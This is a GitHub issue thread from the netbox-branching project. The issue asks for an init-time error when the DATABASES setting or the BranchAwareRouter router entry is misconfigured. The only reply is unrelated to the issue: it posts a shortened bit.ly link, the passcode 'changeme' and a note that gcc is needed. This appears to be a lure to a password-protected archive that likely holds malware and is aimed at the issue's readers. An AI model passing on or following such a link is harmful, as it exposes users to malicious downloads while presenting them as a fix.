### ISSUE TITLE
Raise error or missing configuration items

### ISSUE THREAD

**Issue by jeremystretch** [netboxlabs/netbox-branching#76]
### Proposed Changes

Raise an exception on init if either of the following conditions is not met:

- `settings.DATABASES` must be a `DynamicSchemaDict` instance.
- `DATABASE_ROUTERS` must include the path to `BranchAwareRouter`

### Justification

Without both of these configuration items, branching will not function correctly.

**Comment by z3t444** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
